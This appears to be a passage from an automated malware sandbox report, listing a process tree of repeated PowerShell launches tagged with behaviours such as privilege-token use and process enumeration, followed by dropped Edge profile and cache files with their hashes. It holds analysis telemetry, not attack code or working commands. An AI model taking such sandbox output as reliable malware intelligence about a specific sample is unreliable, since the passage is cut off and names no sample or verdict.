                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6408
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6552
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6684
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6820
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6956
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7084
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6248
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6564
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6940
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6536
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:6528
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7280
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7416
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7544
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7672
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7804
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7940
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8072
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7256
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7656
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8032
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:7908
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8236
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8372
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8496
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8632
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8760
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8896
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9032
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9168
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8012
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:8756
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9140
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:4580
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9272
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9408
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9540
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9680
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9808
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9936
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:10068
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:10200
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9508
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                        PID:9908
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        PID:9396
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        PID:10340
                                                                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                        PID:10348
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo [ 100% "
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:7720
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                      PID:9392
                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:2068
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                        "LogonUI.exe" /flags:0x4 /state0:0xa392d855 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                        PID:2624

                                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              2KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              ed30ca9187bf5593affb3dc9276309a6

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              c63757897a6c43a44102b221fe8dc36355e99359

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              81fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              1df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              280B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              0524c92c95ae22d4f59e3a97b47744ff

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              b5bfc1a1bafe619b75255161b0a295956a28cf9e

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              61e7d262c220c13fc9aa6bc6d35af2e94cb43bee7de3b90840cb7a905769676c

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              74cb6174ba92659c9011afd13b0460753bfe499183d577097251fa8dbfda9a71796dc80d3a00b9933b42d3d6dd386725439d485b96d90e9783dc2c1c6ba315a5

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              280B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              50682d36ea29dc25028cb8219fc8a699

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              f986acb0971c6b7337f450510cab2cb6f74164e8

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              da7fcfc287a041747fbcd486e0e8791a5fb30c64e345e73918d41cee1f655484

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              5e582708ff6a5e6fd56da0a1d5448fbde1588f704178a8347880357c8b29a113cb0660dc22ed2702ba34a7be7d7d7ac37451c16f473d03ce8273025e35d9bcc8

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\60ef4b21-9300-4ed9-8ef6-b64d7514b364.tmp

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              1B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              5058f1af8388633f609cadb75a75dc9d

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              3a52ce780950d4d969792a2559cd519d7ee8c727

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              331B

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              dd616b1ac33c823762bae6902222f878

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              cff9f27788f0442abb44ebf03a2c5c935caf7439

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              fbcf4df43de9eb727ed31ffa93c0fb0ccda804394e2090a3a982f67f8cc31994

                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                              63aaa9e6fad3270b997c0691d8acfc8595ca15b33a574a6773d5f53bb6b1c18d9b35bc4445c8f569b7e1c51be27f8c839be0f85601e3d3117553114d5a5bb4ea

                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0

                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                              44KB

                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                              13b477494b9d13398def88761acf707d

                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                              b8ed7fd5dbe57cf75ba818b68eaccc4487f3024f

                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                              be46dd69fcf95cde897ff83ae92f388d52a4aec19c0056eee747b5984c4924ce

